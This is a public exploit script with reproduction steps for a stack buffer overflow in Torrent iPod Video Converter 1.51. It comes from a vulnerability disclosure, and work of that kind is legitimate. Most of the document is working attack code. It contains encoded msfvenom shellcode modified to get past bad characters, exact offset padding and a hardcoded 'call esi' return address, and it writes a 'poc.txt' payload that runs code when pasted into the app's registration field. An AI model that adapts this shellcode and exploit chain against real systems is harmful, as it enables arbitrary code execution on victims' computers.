Torrent iPod Video Converter version 1.51 suffers from a stack overflow vulnerability.
05f7195f72ae2a1071f7f642ff0cadd0# Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow
# Exploit Author: boku
# Date: 2020-02-10
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe
# Version: Torrent iPod Video Converter Version 1.51 Build 115
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
# 1) Download, install, and open Torrent iPod Video Converter
# 2) run python script & open created 'poc.txt' file
# 3) select-all > copy-all
# 4) in app, click 'Register' on the bottom
# 5) in 'Name:' textbox enter 'a'
# 6) in 'Code:' textbox paste buffer
# 7) click 'OK', calculator will open & app will crash
# ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python
# x86/alpha_upper chosen with final size 447
# the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub.
#shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49"
# echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm -
# 89E7 mov di,sp
# DADC fcmovu st4
# D977F4 fnstenv [bx-0xc]
# 5D pop bp
# 55 push bp
# 59 pop cx
# 49 dec cx
shellcode = b'\x54\x5f' # push esp # pop edi
shellcode += b'\x56\x59' # push esi # pop ecx
shellcode += b'\x41\x90' # inc ecx # nop # Fix the offset for GetPC
shellcode += b'\x90\x90\x90\x90\x90' # keep the byte length the same
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50"
shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39"
shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b"
shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c"
shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a"
shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43"
shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51"
shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c"
shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50"
shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44"
shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a"
shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58"
shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54"
shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b"
shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c"
shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56"
shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45"
shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31"
shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51"
shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45"
shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f"
shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38"
shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37"
shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50"
shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52"
shellcode += b"\x4c\x52\x43\x33\x30\x41\x41"
EIP_OS = '\x41'*(4136-len(shellcode))
EIP = '\x5a\x32\x4f' # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe)
payload = shellcode + EIP_OS + EIP
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")